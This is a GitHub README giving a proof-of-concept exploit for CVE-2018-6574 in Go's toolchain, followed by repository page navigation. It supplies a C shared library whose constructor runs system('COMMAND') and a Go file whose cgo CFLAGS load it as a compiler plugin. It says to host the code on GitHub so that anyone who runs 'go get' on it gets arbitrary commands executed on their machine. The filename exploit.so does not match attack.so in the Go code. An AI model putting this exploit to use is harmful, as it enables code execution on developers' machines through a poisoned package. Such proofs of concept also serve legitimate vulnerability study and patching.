CVE-2018-6574 POC

Exploit POC For CVE-2018-6574

Compile

Create an exploit file with the following:

#include<stdio.h>
#include<stdlib.h>

static void malicious() __attribute__((constructor));

void malicious() {
    system("COMMAND");
}

Compile it:

gcc -shared -o exploit.so -fPIC exploit.c

Finally, you need the go code that will tell cgo to use your plugin:

package main
// #cgo CFLAGS: -fplugin=./attack.so
// typedef int (*intFunc) ();
//
// int
// bridge_int_func(intFunc f)
// {
//      return f();
// }
//
// int fortytwo()
// {
//      return 42;
// }
import "C"
import "fmt"

func main() {
    f := C.intFunc(C.fortytwo)
    fmt.Println(int(C.bridge_int_func(f)))
    // Output: 42
}

then host in a github and run it to gain command Execution:

go get github.com/your-repo/CVE-2018-6574-POC

VERSION

before 1.8.7
before 1.9.4
before Go 1.10rc2

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
README.md		README.md
exploit.c		exploit.c
exploit.so		exploit.so
main.go		main.go

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

exploit.c

exploit.c

exploit.so

exploit.so

main.go

main.go

Repository files navigation

CVE-2018-6574 POC

Compile

VERSION

Refrences

About

Releases

Packages

Languages

ItsFadinG/CVE-2018-6574

Folders and files

Latest commit

History

Repository files navigation

CVE-2018-6574 POC

Compile

VERSION

Refrences

About

Resources

Stars

Watchers

Forks

Languages